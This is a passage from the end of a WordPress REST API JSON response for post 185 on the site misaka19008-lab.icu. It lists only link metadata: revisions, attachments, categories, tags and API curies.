],"version-history":[{"count":1,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/185\/revisions"}],"predecessor-version":[{"id":186,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/185\/revisions\/186"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=185"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/categories?post=185"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/tags?post=185"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}